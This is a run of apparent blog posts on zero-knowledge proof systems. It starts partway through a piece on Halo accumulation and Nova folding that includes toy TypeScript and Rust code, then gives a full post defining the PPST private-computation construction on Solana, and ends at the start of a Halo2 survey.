for some derived scalars $s_i$ and group elements $G_i$. This is the bottleneck — it's a multiscalar multiplication of size linear in the circuit. The accumulation-scheme trick is: at step $k$, instead of *checking* this equation, you produce a fresh "accumulator" $\text{acc}_k = (G_k^{\text{folded}}, P_k^{\text{folded}})$ that combines the current step's MSM with the previous accumulator. After $T$ steps you have one accumulator and one MSM check. Verifier cost: $O(\log T)$ for the recursion plus one final MSM.

The Halo paper formalises this as a **polynomial commitment with deferred opening**. It works because the recursive composition can defer expensive arithmetic, not because it embeds full verification in-circuit. From the abstract:

> We present Halo, the first practical example of recursive proof composition without a trusted setup, using only the discrete logarithm assumption over normal cycles of elliptic curves. Recursion is achieved by amortizing away the expensive verification procedures from within the proof verification cycle, deferring them until the end of the recursion.

Halo2, the Zcash production deployment, uses the same construction over Pasta and ships it in Orchard (Zcash's NU5 upgrade in 2022). Halo2 is also the basis of the Scroll zkEVM and the KZG-backed Halo2 forks (halo2-axiom and friends) used across the Ethereum proving ecosystem.
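The linearity that makes the deferral sound is easy to see in a toy model. A sketch in TypeScript, with integers mod a prime standing in for curve points — no hardness, no hiding, just the linear structure of the accumulated claim (all names and constants here are illustrative):

```typescript
// Toy Halo-style accumulation: defer MSM checks by folding claims.
// The additive group Z_Q stands in for an elliptic-curve group.
const Q = 2147483647n;
const G = [5n, 11n, 23n, 42n]; // fixed "generators"

// A claim: sum_i s[i] * G[i] == P
type MsmClaim = { s: bigint[]; P: bigint };

const msm = (s: bigint[]): bigint =>
  s.reduce((acc, si, i) => (acc + si * G[i]) % Q, 0n);

// Fold two claims with a random challenge r. Because the relation is
// linear in (s, P), the folded claim holds iff both inputs did (with
// high probability over r) — so only ONE expensive MSM check is
// needed, at the very end of the recursion.
function foldClaims(a: MsmClaim, b: MsmClaim, r: bigint): MsmClaim {
  return {
    s: a.s.map((si, i) => (si + r * b.s[i]) % Q),
    P: (a.P + r * b.P) % Q,
  };
}
```

Fold $T$ claims pairwise and check `msm(acc.s) === acc.P` once — that is the deferred verification; a cheating claim survives the fold only if the challenge lands on one specific value.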
## The Nova trick: folding instead of accumulating

Two years after Halo, [Nova (Kothapalli, Setty, Tzialla 2022)](https://eprint.iacr.org/2021/370) reframed the problem entirely. Instead of accumulating an MSM, Nova introduces a **folding scheme**: a primitive that takes two instances of a relation and folds them into a single instance, with prover cost $O(|F|)$ for some step circuit $F$ and **no SNARK at all** in the recursion.

The Nova relation is a relaxed R1CS instance:

$$
\mathbf{A} \mathbf{z} \circ \mathbf{B} \mathbf{z} = u \mathbf{C} \mathbf{z} + \mathbf{e}
$$

where $\mathbf{A}, \mathbf{B}, \mathbf{C}$ are the constraint matrices, $\mathbf{z}$ is the witness extended with public inputs, $u$ is a slack scalar (1 in the standard R1CS case), and $\mathbf{e}$ is an *error vector* (zero in the standard case). The "relaxed" part is that $u$ and $\mathbf{e}$ are allowed to be nonzero — that's what makes folding possible.

Given two relaxed R1CS instances $(u_1, \mathbf{z}_1, \mathbf{e}_1)$ and $(u_2, \mathbf{z}_2, \mathbf{e}_2)$, the folding scheme produces a single instance $(u, \mathbf{z}, \mathbf{e})$ via a random challenge $r$:

$$
u = u_1 + r \cdot u_2, \quad \mathbf{z} = \mathbf{z}_1 + r \cdot \mathbf{z}_2, \quad \mathbf{e} = \mathbf{e}_1 + r \cdot \mathbf{T} + r^2 \cdot \mathbf{e}_2
$$

with $\mathbf{T}$ a "cross-term" the prover sends to the verifier. The folded instance is satisfying iff both originals were (with overwhelming probability). Crucially, **folding does not require the verifier to do any expensive cryptographic work**: $\mathbf{T}$ is a vector commitment, $r$ is a Fiat-Shamir challenge, and the new $(u, \mathbf{z}, \mathbf{e})$ is a linear combination. No pairings. No SNARK.
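The algebra is checkable numerically. A sketch in TypeScript over a toy prime field, for a single constraint $w_0 \cdot w_1 = w_2$, using the actual Nova cross-term $\mathbf{T} = A\mathbf{z}_1 \circ B\mathbf{z}_2 + A\mathbf{z}_2 \circ B\mathbf{z}_1 - u_1 \cdot C\mathbf{z}_2 - u_2 \cdot C\mathbf{z}_1$ (the field, instance values, and challenge below are arbitrary picks for illustration):

```typescript
// Numeric check of the Nova fold for one constraint w0 * w1 = w2.
const P = 2305843009213693951n; // 2^61 - 1, a toy prime field
const md = (x: bigint): bigint => ((x % P) + P) % P;

// For z = [w0, w1, w2]: (A z) = w0, (B z) = w1, (C z) = w2.
const Az = (z: bigint[]) => z[0];
const Bz = (z: bigint[]) => z[1];
const Cz = (z: bigint[]) => z[2];

type Relaxed = { u: bigint; z: bigint[]; e: bigint };

// Relaxed R1CS relation: Az ∘ Bz = u · Cz + e.
const satisfies = (i: Relaxed): boolean =>
  md(Az(i.z) * Bz(i.z)) === md(i.u * Cz(i.z) + i.e);

// Nova fold, with the real cross-term:
// T = Az1∘Bz2 + Az2∘Bz1 − u1·Cz2 − u2·Cz1.
function fold(i1: Relaxed, i2: Relaxed, r: bigint): Relaxed {
  const T = md(
    Az(i1.z) * Bz(i2.z) + Az(i2.z) * Bz(i1.z) - i1.u * Cz(i2.z) - i2.u * Cz(i1.z)
  );
  return {
    u: md(i1.u + r * i2.u),
    z: i1.z.map((zi, k) => md(zi + r * i2.z[k])),
    e: md(i1.e + r * T + r * r * i2.e),
  };
}
```

Two fresh instances (with $u = 1$, $\mathbf{e} = 0$) fold into an instance with nonzero slack and error that still satisfies the relaxed relation — which is the whole point of relaxing R1CS in the first place.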
The Nova **incrementally verifiable computation (IVC) recurrence** is then:

$$
(u_{i+1}, \mathbf{z}_{i+1}, \mathbf{e}_{i+1}) = \text{Fold}\big( (u_i, \mathbf{z}_i, \mathbf{e}_i), \; (u_F, \mathbf{z}_F^{(i)}, \mathbf{0}) \big)
$$

where the second instance is a fresh R1CS encoding of "step $i$ of the program $F$ executed correctly." After $T$ steps, you have one relaxed R1CS instance, and you produce a single SNARK that proves it's satisfying. The SNARK runs *once*, at the end. Every step in between is folding.

The cost asymmetry is the entire pitch. Halo's per-step cost is $O(|F|)$ for the step plus $O(\log T)$ for the recursion. Nova's per-step cost is just $O(|F|)$ — no recursion overhead. For long computations ($T \gg 1$) Nova is significantly cheaper. The trade-off: Nova gives you one final SNARK to verify, while Halo gives you a SNARK at every step.

<Mermaid chart={`graph TD
  subgraph N0[Nova step 0]
    R0[R1CS instance z_0]
  end
  subgraph N1[Nova step 1]
    F1[execute F at step 1] --> R1[fresh R1CS z_1]
    Acc0[accumulator U_0] --> Fold1[fold]
    R1 --> Fold1
    Fold1 --> Acc1[accumulator U_1]
  end
  subgraph N2[Nova step 2]
    F2[execute F at step 2] --> R2[fresh R1CS z_2]
    Acc1 --> Fold2[fold]
    R2 --> Fold2
    Fold2 --> Acc2[accumulator U_2]
  end
  R0 --> Acc0
  Acc2 --> SNARK[final SNARK proves U_T satisfying]
  classDef step fill:#0a0a0a,stroke:#4ade80,color:#4ade80
  class N0,N1,N2 step`}/>

The folding scheme is the entire idea. Everything else in Nova is bookkeeping around it.

## Halo2, Nova, SuperNova, HyperNova — what's the difference

Four production-grade recursive systems, four design points. The two questions that decide which one to reach for in 2026:

1. **Is your computation a uniform step that repeats, or a heterogeneous instruction set?** Uniform: Nova. Heterogeneous: SuperNova. (HyperNova handles both via CCS.)
2. **Do you need a SNARK at every step, or can you defer to one final SNARK?** Every step: Halo2. Defer: Nova / SuperNova / HyperNova.
For a privacy-pool transfer, neither of these is the right shape — you want a single SNARK per spend, no recursion. For [zera-sdk](/blog/zera_sdk_scaffolding/) we ship Groth16 and don't recurse. For a *rollup* settling many transfers in a batch, Nova-flavoured folding is the right structural answer because the per-step cost is dominated by the transfer logic and the final SNARK only runs once per epoch.

## A Nova folding step, in Rust

The cleanest way to see what's actually happening in a folding step is to write one out. The skeleton below is a Nova-shaped folding step over a toy R1CS — no pairings, no real curve, no soundness, but the linear-combination structure is the real thing.

<RustPlayground code={`// A Nova-shaped folding step over a toy "relaxed R1CS" instance.
// This is INTENTIONALLY toy-shaped: scalars are u128 mod a prime, the
// "commitment" is a hash, and there's no curve arithmetic. The shape of
// the linear combinations is real; the soundness is not.
//
// Reference: Nova: Recursive Zero-Knowledge Arguments from Folding Schemes
// https://eprint.iacr.org/2021/370

const MODULUS: u128 = (1u128 << 61) - 1; // toy Mersenne prime

#[derive(Clone, Debug)]
struct RelaxedR1CS {
    /// Slack scalar: 1 for a fresh instance, accumulates after folding.
    u: u128,
    /// Witness extended with public inputs.
    z: Vec<u128>,
    /// Error vector: 0 for a fresh instance, accumulates after folding.
    e: Vec<u128>,
    /// Vector commitment to z. (Toy: just a checksum.)
    com_z: u128,
    /// Vector commitment to e.
    com_e: u128,
}

fn add(a: u128, b: u128) -> u128 {
    (a.wrapping_add(b)) % MODULUS
}

fn mul(a: u128, b: u128) -> u128 {
    (a.wrapping_mul(b)) % MODULUS
}

fn vec_add(a: &[u128], b: &[u128]) -> Vec<u128> {
    a.iter().zip(b.iter()).map(|(x, y)| add(*x, *y)).collect()
}

fn vec_scale(a: &[u128], s: u128) -> Vec<u128> {
    a.iter().map(|x| mul(*x, s)).collect()
}

// Toy "commitment": rolling hash. A real Nova uses Pedersen commitments.
fn commit(v: &[u128]) -> u128 {
    let mut h: u128 = 0xCAFE_BABE_DEAD_BEEF;
    for x in v {
        h = h.wrapping_mul(0x100000001b3).wrapping_add(*x);
    }
    h % MODULUS
}

/// Fold two relaxed R1CS instances into one, using random challenge r.
/// Returns the folded instance and the cross-term T (which the prover
/// sends to the verifier in a real protocol).
fn fold(
    inst1: &RelaxedR1CS,
    inst2: &RelaxedR1CS,
    r: u128,
) -> (RelaxedR1CS, Vec<u128>) {
    // Cross term T. In real Nova: T = Az_1 o Bz_2 + Az_2 o Bz_1
    //                                 - u_1 * C z_2 - u_2 * C z_1.
    // Toy: just a placeholder of the right shape.
    let len = inst1.e.len();
    let cross_term: Vec<u128> = (0..len)
        .map(|i| {
            let t1 = mul(inst1.u, inst2.z.get(i).copied().unwrap_or(0));
            let t2 = mul(inst2.u, inst1.z.get(i).copied().unwrap_or(0));
            add(t1, t2)
        })
        .collect();

    // Folded slack scalar: u = u_1 + r * u_2
    let u = add(inst1.u, mul(r, inst2.u));
    // Folded witness: z = z_1 + r * z_2
    let z = vec_add(&inst1.z, &vec_scale(&inst2.z, r));
    // Folded error: e = e_1 + r * T + r^2 * e_2
    let r2 = mul(r, r);
    let e = vec_add(
        &vec_add(&inst1.e, &vec_scale(&cross_term, r)),
        &vec_scale(&inst2.e, r2),
    );

    let folded = RelaxedR1CS {
        u,
        com_z: commit(&z),
        com_e: commit(&e),
        z,
        e,
    };
    (folded, cross_term)
}

fn fresh_instance(z: Vec<u128>) -> RelaxedR1CS {
    let e = vec![0u128; z.len()];
    let com_z = commit(&z);
    let com_e = commit(&e);
    RelaxedR1CS { u: 1, z, e, com_z, com_e }
}

fn main() {
    // Step 0: fresh instance with witness z_0.
    let acc = fresh_instance(vec![3, 5, 7, 11]);
    println!("step 0: u={}, |z|={}, com_z={:#x}", acc.u, acc.z.len(), acc.com_z);

    // Step 1: fold in a fresh R1CS instance from running F at step 1.
    let step1 = fresh_instance(vec![13, 17, 19, 23]);
    let r1: u128 = 0xDEADBEEF; // Fiat-Shamir challenge in real protocol
    let (acc, _t) = fold(&acc, &step1, r1);
    println!("step 1: u={}, com_z={:#x}, |e|={}", acc.u, acc.com_z, acc.e.len());

    // Step 2: fold in another step.
    let step2 = fresh_instance(vec![29, 31, 37, 41]);
    let r2: u128 = 0xFEEDFACE;
    let (acc, _t) = fold(&acc, &step2, r2);
    println!("step 2: u={}, com_z={:#x}", acc.u, acc.com_z);

    // After T steps, the final accumulator is one relaxed R1CS instance.
    // The protocol proves it's satisfying via a single SNARK at the end.
    println!("\\nfinal accumulator captures all 3 steps in one instance.");
    println!("a SNARK proves this instance is satisfying — 1 proof for any T.");
}
`}/>

The shape is the thing. The fold is just three linear combinations: $u' = u_1 + r u_2$, $\mathbf{z}' = \mathbf{z}_1 + r \mathbf{z}_2$, $\mathbf{e}' = \mathbf{e}_1 + r \mathbf{T} + r^2 \mathbf{e}_2$. The cross-term $\mathbf{T}$ is what the prover sends; the challenge $r$ is Fiat-Shamir over the transcript. In real Nova the witness $\mathbf{z}$ is replaced by a Pedersen commitment to it (so the verifier never sees the witness), and the error vector $\mathbf{e}$ is replaced by a commitment as well. The linear structure of the fold is preserved by the additive-homomorphic property of the Pedersen commitment, which is the entire reason Pedersen is the right primitive here.

## Where this lands for ZERA

The honest answer about recursion in [zera-sdk](/blog/zera_sdk_scaffolding/) v1: we don't use it. A privacy transfer is one Groth16 proof per spend, and there's nothing to recurse over. The advantage of recursion shows up when:

- You're settling many transfers in a batch (rollup shape) and want to compress them into one proof.
- You're running a zkVM (Lurk, Jolt, RISC0) where the program has many uniform steps.
- You're building a light client that has to verify a long chain of proofs cheaply.

For ZERA's transfer flow, none of these apply. For the eventual settlement layer that sits *underneath* a chain of ZERA transfers (think: a state-root proof every epoch), Nova-style folding is the right shape, and the design seam is in `crates/zera-sdk-core/src/recursion.rs`. Empty file today. We've left the door open.
The reason I wrote this post anyway is that recursion is the part of the ZK stack that's most actively moving in 2026. HyperNova landed at CRYPTO 2024 with a CCS-based unification of R1CS / AIR / Plonkish that was supposed to take five more years. The next two years are going to compress IVC primitives down to "one folding scheme, three commitment choices, pick your poison." Anyone deploying a ZK system today should know what shape that compressed primitive will be, because the migration cost will be the difference between a clean refactor and a rewrite.

## Further reading

- [Halo: Recursive Proof Composition without a Trusted Setup](https://eprint.iacr.org/2019/1021) — Bowe, Grigg, Hopwood (2019) — the accumulation-scheme paper.
- [Nova: Recursive Zero-Knowledge Arguments from Folding Schemes](https://eprint.iacr.org/2021/370) — Kothapalli, Setty, Tzialla (CRYPTO 2022) — the folding-scheme paper.
- [SuperNova: Proving universal machine executions without universal circuits](https://eprint.iacr.org/2022/1758) — Kothapalli, Setty (2022) — the per-instruction folding extension.
- [HyperNova: Recursive Arguments for Customizable Constraint Systems](https://eprint.iacr.org/2023/573) — Kothapalli, Setty (CRYPTO 2024) — CCS-based unification.
- [microsoft/Nova](https://github.com/microsoft/Nova) — the canonical Rust implementation.
- [Halo2 book](https://zcash.github.io/halo2/) — the production deployment behind Zcash NU5.
- [Poseidon, by hand and by code](/blog/poseidon_by_hand_and_by_code/) — the hash function inside the recursion circuit.
- [Why BN254, and when to switch off it](/blog/why_bn254_and_when_to_switch/) — the curve choice underneath the SNARK that closes the recursion.

---

# PPST: extending SPST to arbitrary private computation

Canonical: https://blog.skill-issue.dev/blog/ppst_private_programmable_state/
Description: F_RP Construction II.
Generalises SPST to private programmable state: arbitrary arithmetic circuits over committed pre/post-state, with R1CS-embedded program execution and atomic PPST-SPST composition.
Published: 2026-05-02T15:00:00.000Z
Tags: zk, cryptography, circuits, r1cs, aleo, aztec, phd

import { Mermaid, TradeoffTable, Aside, Quote } from "@/components/mdx";

[SPST](/blog/spst_self_paying_shielded_transactions/) gave us private value transfer with self-paying fees on a smart-contract chain. That's the Solana analogue of Zcash's Sapling — and exactly what every existing relayer-dependent privacy mixer (Tornado, RAILGUN, Light v1) does, just without the relayer.

But Tornado-style protocols are not the goal. The goal is **Turing-complete** private computation: a Solana program that runs on encrypted state and produces a proof of correct execution without leaking what the state was, what the inputs were, or what the program output. That's PPST.

This is post 4 of 11 in the [relayerless-privacy](/series/relayerless-privacy) series. Reading [post 3](/blog/spst_self_paying_shielded_transactions/) first will help, but the construction here stands alone.

## What "private program" means here

**Definition (Private Program).** A *private program* is an arithmetic circuit

$$
C : \mathbb{F}_p^{n_{\mathsf{in}}} \to \mathbb{F}_p^{n_{\mathsf{out}}}
$$

over the BN254 scalar field, specified by an R1CS constraint system $(A, B, C)$ of size $N_C$. Each program is identified by

$$
\mathsf{program\_id} \;=\; \mathsf{Poseidon}(\mathsf{vk}_C),
$$

where $\mathsf{vk}_C$ is the Groth16 verification key. The program identifier is a **public, deterministic commitment to the program's logic**.

**Definition (Private State).** A vector $\mathsf{state} \in \mathbb{F}_p^k$ committed as

$$
\mathsf{cm}_{\mathsf{state}} \;=\; \mathsf{Poseidon}(\mathsf{state}[0], \ldots, \mathsf{state}[k-1], r_{\mathsf{state}}).
$$

State commitments are leaves in a state Merkle tree $\mathcal{T}_S$ of depth 32, root $\mathsf{rt}_S$.
This is a separate tree from the SPST note-commitment tree.

**Definition (State Transition).** A triple $(\mathsf{state}_{\mathsf{pre}}, \mathsf{aux}, \mathsf{state}_{\mathsf{post}})$ where $\mathsf{aux}$ is private auxiliary input and

$$
C(\mathsf{state}_{\mathsf{pre}}, \mathsf{aux}) \;=\; \mathsf{state}_{\mathsf{post}}.
$$

The transition consumes $\mathsf{cm}_{\mathsf{pre}}$ via nullification and produces $\mathsf{cm}_{\mathsf{post}}$ as a new tree leaf. **The program logic $C$ is never revealed to the verifier — only $\mathsf{program\_id}$ is.**

## The PPST relation

The relation $\mathcal{R}_{\mathsf{PPST}}$ is the set of $(x, w)$ pairs:

**Public instance** $x = \bigl(\mathsf{rt}_{\mathsf{pre}}, \mathsf{rt}_{\mathsf{post}}, \mathsf{nf}_{\mathsf{state}}, \mathsf{cm}_{\mathsf{post}}, \mathsf{program\_id}, f\bigr)$.

**Private witness** $w = \bigl(\mathsf{state}_{\mathsf{pre}}, r_{\mathsf{pre}}, \mathsf{path}_{\mathsf{pre}}, sk_{\mathsf{state}}, \mathsf{aux}, \mathsf{state}_{\mathsf{post}}, r_{\mathsf{post}}, \mathsf{vk}_C\bigr)$.
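As a concrete shape, the instance/witness split can be written as plain Rust structs. This is an illustrative sketch only: the type names and field layout are mine, not the zera-sdk API, and field elements are reduced to opaque 32-byte arrays.

```rust
// Illustrative only: these names mirror the math above, not any real API.
// A BN254 field element is modeled as an opaque 32-byte array.
type Fp = [u8; 32];

/// Public instance x: everything the on-chain verifier sees.
struct PpstInstance {
    rt_pre: Fp,     // state-tree root before the transition
    rt_post: Fp,    // state-tree root after the transition
    nf_state: Fp,   // nullifier consuming cm_pre
    cm_post: Fp,    // commitment to the new state
    program_id: Fp, // Poseidon(vk_C), public by design
    fee: u64,       // f
}

/// Private witness w: never leaves the prover.
struct PpstWitness {
    state_pre: Vec<Fp>,  // pre-state vector
    r_pre: Fp,           // commitment randomness for cm_pre
    path_pre: Vec<Fp>,   // Merkle authentication path, depth 32
    sk_state: Fp,        // state-authorization key
    aux: Vec<Fp>,        // private auxiliary input to C
    state_post: Vec<Fp>, // post-state vector
    r_post: Fp,          // commitment randomness for cm_post
    vk_c: Vec<u8>,       // Groth16 verification key identifying C
}

fn main() {
    let x = PpstInstance {
        rt_pre: [0; 32], rt_post: [0; 32], nf_state: [0; 32],
        cm_post: [0; 32], program_id: [0; 32], fee: 5_000,
    };
    let w = PpstWitness {
        state_pre: vec![[0; 32]; 4], r_pre: [0; 32],
        path_pre: vec![[0; 32]; 32], sk_state: [0; 32],
        aux: vec![], state_post: vec![[0; 32]; 4],
        r_post: [0; 32], vk_c: vec![],
    };
    // A depth-32 tree means the witness carries 32 sibling hashes.
    assert_eq!(w.path_pre.len(), 32);
    println!("instance fee = {}, witness path nodes = {}", x.fee, w.path_pre.len());
}
```

The constraints below are exactly the equations the circuit enforces between fields of `x` and fields of `w`.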
Nine constraints, all enforced by the outer PPST circuit:

| # | Name | Constraint |
|---|------|-----------|
| P1 | Program identification | $\mathsf{program\_id} = \mathsf{Poseidon}(\mathsf{vk}_C)$ |
| P2 | Pre-state commitment | $\mathsf{cm}_{\mathsf{pre}} = \mathsf{Poseidon}(\mathsf{state}_{\mathsf{pre}}, r_{\mathsf{pre}})$ |
| P3 | Pre-state membership | $\mathsf{MerkleVerify}(\mathsf{rt}_{\mathsf{pre}}, \mathsf{cm}_{\mathsf{pre}}, \mathsf{path}_{\mathsf{pre}}) = 1$ |
| P4 | State nullification | $\mathsf{nf}_{\mathsf{state}} = \mathsf{PRF}_{sk_{\mathsf{state}}}(\mathsf{cm}_{\mathsf{pre}})$ |
| **P5** | **Program execution** | $C(\mathsf{state}_{\mathsf{pre}}, \mathsf{aux}) = \mathsf{state}_{\mathsf{post}}$ |
| P6 | Post-state commitment | $\mathsf{cm}_{\mathsf{post}} = \mathsf{Poseidon}(\mathsf{state}_{\mathsf{post}}, r_{\mathsf{post}})$ |
| P7 | Post-state tree update | $\mathsf{rt}_{\mathsf{post}} = \mathsf{MerkleInsert}(\mathsf{rt}_{\mathsf{pre}}, \mathsf{cm}_{\mathsf{post}})$ |
| P8 | Fee extraction | value-bearing state OR companion SPST |
| P9 | State authorization | $\mathsf{pk}_{\mathsf{state}} = \mathsf{PRF}_{sk_{\mathsf{state}}}(0)$ embedded in pre-state |

P5 is the heart of the construction. The user-defined program $C$ — written in Circom, Noir, Leo, or any high-level circuit DSL — is **embedded as a sub-circuit** inside the outer PPST relation. The R1CS for $C$ becomes constraints inside the R1CS for $\mathcal{R}_{\mathsf{PPST}}$.

## How the program embedding works

<Mermaid chart={`flowchart TD
  A[private fn swap{a,b}<br/>in Noir/Leo/Circom] --> B[Compiler]
  B --> C[R1CS for C<br/>~10K-1M constraints]
  C --> D[Merge into PPST circuit<br/>R1CS_PPST = R1CS_overhead + R1CS_C]
  D --> E[Groth16.Setup<br/>per-program ceremony]
  E --> F[vk_C → on-chain PDA<br/>at addr_C = PDA{H{vk_C}}]
  classDef step stroke:#4ade80,stroke-width:2px,fill:#0a0a0a,color:#fff
  class A,B,C,D,E,F step
`}/>

The outer circuit sizes look like:

$$
N_{\mathsf{PPST}} \;\approx\; N_{\mathsf{overhead}} \;+\; N_C
$$

where $N_{\mathsf{overhead}} \approx 25{,}000$ R1CS constraints (Merkle paths, commitment hashes, PRF evaluations — see SPST §3.1.6) and $N_C$ is the program circuit size.

| Program complexity | $N_C$ | Total PPST | Groth16 prove (M2) |
|--------------------|-------|------------|---------------------|
| **Simple** (token transfer, vote, ACL) | 10³ — 10⁴ | 35,000 — 50,000 | 1 — 3 s |
| **Moderate** (private AMM swap, auction bid, credential) | 10⁵ — 10⁶ | 125,000 — 10⁶ | 5 — 60 s |
| **Complex** (private ML inference, DB queries) | > 10⁷ | impractical for direct Groth16 | minutes — hours |

Complex programs need IVC. PPST extends naturally: decompose the computation into $T$ uniform steps each running $C_{\mathsf{step}}$, fold them with Nova or SuperNova, then wrap the final accumulator in a Groth16 decider proof. **The on-chain verifier always sees a constant-size 128-byte proof regardless of $T$.** Off-chain proving is $O(T \cdot |C_{\mathsf{step}}|)$ but the chain doesn't care.

## Theorem 3.6 — PPST soundness

**Statement.** If Groth16 is knowledge-sound and Poseidon is collision-resistant, no PPT adversary can cause the PPST verifier to accept a transaction corresponding to an invalid state transition (one where $C(\mathsf{state}_{\mathsf{pre}}, \mathsf{aux}) \neq \mathsf{state}_{\mathsf{post}}$) except with negligible probability.

**Proof sketch.** Suppose $\mathcal{A}$ produces a valid PPST transaction whose underlying transition is invalid. By Groth16 knowledge soundness, the extractor $\mathcal{E}$ recovers a witness $w^*$ satisfying constraints P1–P9 — including P5: $C(\mathsf{state}^*_{\mathsf{pre}}, \mathsf{aux}^*) = \mathsf{state}^*_{\mathsf{post}}$. Direct contradiction.
∎

**Corollary (State Integrity).** The state tree $\mathcal{T}_S$ maintains the invariant that every leaf is a commitment to a state that resulted from a valid execution of an authorized program starting from a previously valid state. By induction on accepted transactions, this invariant holds at all times.

## Theorem 3.7 — PPST zero-knowledge

**Statement.** PPST reveals nothing about $\mathsf{state}_{\mathsf{pre}}$, $\mathsf{state}_{\mathsf{post}}$, $\mathsf{aux}$, or the internal logic of $C$ beyond the public outputs.

**Proof sketch.** Direct from perfect ZK of Groth16. The simulator $\mathcal{S}$ depends only on the public instance $x$, not on the witness. For any two valid witnesses $w_0, w_1$ consistent with the same $x$, the proof distributions are identical.

What does leak:

- **`program_id`** is intentionally public. It identifies which program executed so the verifier can pick the right verification key. *Full function privacy* (hiding the program identity) requires a universal circuit or a commitment-to-vk argument and is left as a future extension.
- The fact that *some* state transition occurred under that program.
- The fee $f$.

What does not leak:

- The specific state values.
- The auxiliary inputs.
- Which specific leaf in $\mathcal{T}_S$ was consumed.

## Theorem 3.8 — PPST-SPST composability

This is the magic. PPST and SPST compose into a single atomic transaction: **execute a private program AND transfer shielded value, in one ZK proof.**

Construct the composite relation $\mathcal{R}_{\mathsf{PPST+SPST}} = \mathcal{R}_{\mathsf{PPST}} \wedge \mathcal{R}_{\mathsf{SPST}}$ with a *linking constraint*:

$$
\mathsf{link} \;=\; \mathsf{Poseidon}(\mathsf{nf}_{\mathsf{state}}, \mathsf{nf}_1, \ldots, \mathsf{nf}_n)
$$

binding the PPST state nullifier to the SPST input nullifiers. Both sub-proofs reference the same `link` value as a public input.
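The shape of that linking value can be sketched in a few lines of Rust. A throwaway FNV-style mixer stands in for Poseidon here, so the only thing this demonstrates is the structure: one public value that both sub-proofs must recompute identically, and that changes if any nullifier is substituted. The function names are mine, purely illustrative.

```rust
// Toy stand-in for Poseidon: an FNV-1a-style mixer over u64 "field elements".
// Demonstrates the binding shape only; no cryptographic properties intended.
fn toy_hash(inputs: &[u64]) -> u64 {
    let mut h: u64 = 0xcbf29ce484222325; // FNV-1a offset basis
    for x in inputs {
        h = (h ^ x).wrapping_mul(0x100000001b3); // FNV-1a prime
    }
    h
}

/// link = H(nf_state, nf_1, ..., nf_n): the PPST state nullifier
/// concatenated with every SPST input nullifier, hashed once.
fn link(nf_state: u64, spst_nullifiers: &[u64]) -> u64 {
    let mut inputs = vec![nf_state];
    inputs.extend_from_slice(spst_nullifiers);
    toy_hash(&inputs)
}

fn main() {
    let l1 = link(42, &[7, 11, 13]);
    let l2 = link(42, &[7, 11, 13]);
    let l3 = link(42, &[7, 11, 14]); // one nullifier swapped
    assert_eq!(l1, l2); // deterministic: both sub-proofs recompute it
    assert_ne!(l1, l3); // any nullifier substitution breaks the link
    println!("link = {:#x}", l1);
}
```

Because `link` is a public input to both sub-proofs, a verifier that checks the two proofs against the same value has checked atomicity for free.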
Cross-constraint (Value Mediation): if the program outputs a transfer amount $\Delta v$, the SPST component enforces

$$
\sum_i v^{(\mathsf{SPST})}_{\mathsf{in},i} \;=\; \sum_j v^{(\mathsf{SPST})}_{\mathsf{out},j} \;+\; f \;+\; \Delta v_{\mathsf{to\_program}}.
$$

That is — value flowing from the SPST shielded pool *into* the program's state (or out of it) is reconciled inside the proof. An observer cannot tell whether the program consumed value, produced value, or merely transferred it.

**Practical realisation.** For a moderate program ($N_C \sim 50{,}000$):

$$
N_{\mathsf{comp}} = N_{\mathsf{PPST}} + N_{\mathsf{SPST}} + N_{\mathsf{link}} \;\approx\; (50{,}000 + 25{,}000) + 24{,}000 + 400 \;\approx\; 100{,}000 \text{ constraints}.
$$

Groth16 prover time on commodity hardware: 5–10 seconds. **Single 128-byte proof on-chain.** ~200,000 CU verification cost on Solana.

## Comparison with Aleo and Aztec

The thing PPST gets that Aleo and Aztec don't is **deployment as a protocol layer on a high-performance Layer-1**. Aleo and Aztec each require running their own consensus or sequencer. PPST runs as a Solana program on the same validators as Jupiter and Helium — inheriting Solana's TPS, finality, and infrastructure.

## What's left

PPST plus SPST gives us private value + private computation. That's two of the three privacy properties. The remaining gap is **submitter anonymity**: even with a perfect ZK proof, the wrapping Solana transaction is signed by an Ed25519 key whose public key is on-chain. Address graph analysis trivially links the "private" transaction to the submitter's identity.

The next post is about closing that gap — without a relayer, without a mixing service, and without a separate L1.

## Bibliography

- Bowe, S., Chiesa, A., Green, M., Miers, I., Mishra, P., Wu, H. (2020). *ZEXE: Enabling Decentralized Private Computation.* IEEE S&P 2020.
- Chiesa, A., Hu, Y., Maller, M., Mishra, P., Vesely, N., Ward, N. (2020). *Marlin: Preprocessing zkSNARKs with Universal and Updatable SRS.* EUROCRYPT 2020. https://eprint.iacr.org/2019/1047
- Aztec Network. *Client-side Proof Generation.* https://aztec.network/blog/client-side-proof-generation
- Kothapalli, A., Setty, S., Tzialla, I. (2022). *Nova: Recursive Zero-Knowledge Arguments from Folding Schemes.* https://eprint.iacr.org/2021/370
- Noir Language Documentation. https://noir-lang.org/docs/

Previous: [SPST: self-paying shielded transactions ←](/blog/spst_self_paying_shielded_transactions/) · Next: [TAB: threshold-anonymous broadcast →](/blog/tab_threshold_anonymous_broadcast/)

---

# Halo2 in 2026: what changed since the Zcash era

Canonical: https://blog.skill-issue.dev/blog/halo2_in_2026_what_changed/
Description: A survey of the Halo2 ecosystem six years after the Zcash team published it — what stayed the same (PLONKish, lookups, IPA), what evolved (KZG, gadget libraries, fork landscape), and what we ship today.
Published: 2026-05-01T15:30:00.000Z
Tags: halo2, plonk, zcash, kzg, lookups, zk, phd

import { Mermaid, RustPlayground, TradeoffTable, Aside, Quote } from "@/components/mdx";

When Zcash open-sourced [Halo2](https://github.com/zcash/halo2) in 2020, it was a research artefact attached to a single deployment target — Zcash's Orchard pool — and a single polynomial-commitment choice — IPA over the Pasta cycle of curves. Six years later it is a small ecosystem of forks, used by Scroll, Taiko, Axiom, and roughly half the EVM rollups under construction in 2026. The original repository has been in maintenance mode since 2024.

This post is the orientation I wish someone had handed me when I started auditing Halo2 circuits seriously.

*What stayed the same?* The arithmetisation. The lookup argument. The mental model of *chips inside regions inside columns*.

*What evolved?* The polynomial commitment scheme, the curve choices, the gadget library, and most of all the fork landscape.
By the end you should have a defensible answer to "which Halo2 do you mean?" — which is the question every serious ZK conversation in 2026 reduces to within five minutes.

## What stayed: the PLONKish arithmetisation

The shape of a Halo2 circuit hasn't changed since 2020. You define **columns** — advice (witness), fixed (constants), and instance (public inputs) — and a **rectangular grid** of cells indexed by row and column. The prover assigns values to advice cells; the constraint system asserts polynomial relations on those values, evaluated at every row.

Three families of constraints make up a Halo2 circuit:

